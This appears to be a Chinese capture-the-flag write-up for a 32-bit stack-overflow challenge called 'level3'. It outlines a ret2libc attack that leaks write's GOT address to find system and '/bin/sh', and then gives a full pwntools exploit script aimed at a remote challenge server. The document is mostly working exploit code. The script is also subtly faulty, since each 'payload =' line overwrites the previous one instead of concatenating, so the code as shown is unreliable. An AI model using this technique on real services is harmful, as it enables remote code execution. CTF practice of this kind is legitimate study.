image.png
拖进ida,发现栈溢出,没有system,没有binsh,所以我们需要自己泄露
image.png
思路:
第一次溢出返回到write函数执行write(1,write_got,4)得到write的真实地址(即先需要p.recv() #这里一定要先接收一次,这样到下面接收write_addr的时候才不会出错),计算得到system跟"/bin/sh"的真实地址,然后再返回到vulnerable_function函数,第二次回到溢出点,覆盖返回地址到system执行system("/bin/sh")
image.png
脚本
#!/usr/bin/env python
#-*-coding:utf-8-*-
from pwn import *
p = remote('111.198.29.45',39255)
elf = ELF('./level3')
libc = ELF('/lib/i386-linux-gnu/libc.so.6')
function = 0x0804844B
write_plt = elf.plt['write']
write_got = elf.got['write']
write_libc = libc.symbols['write']
system_libc = libc.symbols['system']
binsh = libc.search("/bin/sh").next()
p.recv()
payload = 'a'*(0x88+0x04)
payload = p32(write_plt) + p32(function)
payload = p32(1) + p32(write_got) + p32(4)
p.sendline(payload)
write_addr = u32(p.recv(4))
offset = write_addr - write_libc
system_addr = offset + system_libc
binsh_addr = offset +binsh
payload = 'a'*(0x88+0x04)
payload = p32(system_addr) + p32(function) + p32(binsh_addr)
p.sendline(payload)
p.interactive()
